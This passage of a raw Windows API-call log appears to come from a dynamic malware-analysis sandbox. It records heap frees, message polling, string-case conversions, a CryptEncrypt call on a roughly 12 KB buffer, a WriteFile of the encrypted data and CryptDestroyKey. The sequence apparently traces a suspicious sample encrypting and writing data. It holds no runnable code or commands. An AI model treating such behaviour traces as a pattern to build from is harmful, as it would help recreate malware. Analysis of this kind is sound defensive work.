HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a93600 | out: hHeap=0x2af0000) returned 1 [0221.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0221.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0221.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0221.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0221.765] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x318d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3190) returned 1 [0221.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.765] CharLowerBuffW (in: lpsz="byte[12688]", cchLength=0xb | out: lpsz="byte[12688]") returned 0xb [0221.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.765] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.766] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0221.766] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a93600*, pdwDataLen=0x8cef60*=0x318d, dwBufLen=0x3190 | out: pbData=0x2a93600*, pdwDataLen=0x8cef60*=0x3190) returned 1 [0221.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.767] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0221.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.767] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0221.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.767] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0221.767] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.767] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0221.767] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.767] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.767] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.767] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.767] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.767] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.768] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.769] WriteFile (in: hFile=0x4dc, lpBuffer=0x2aa2df8*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aa2df8*, lpNumberOfBytesWritten=0x8cf5e4*=0x3190, lpOverlapped=0x0) returned 1 [0221.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.771] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0221.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.771] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0221.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.771] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.771] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0221.771] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.771] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0221.771] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0221.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab938, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0221.771] CryptDestroyKey (hKey=0x9e2238) returned 1 [0221.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.771] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0221.772] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.772] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0221.772] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.772] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.772] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0221.772] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.772] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0221.772] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.772] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.772] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0221.772] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.773] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0221.773] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0221.773] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0221.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.773] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.773] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.773] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0221.773] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.773] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0221.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.774] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0221.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.774] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0221.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.774] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.774] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.774] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.774] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.774] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.774] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.774] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.774] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.774] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.774] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.774] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.774] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.774] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0221.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.775] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0221.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0221.775] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, 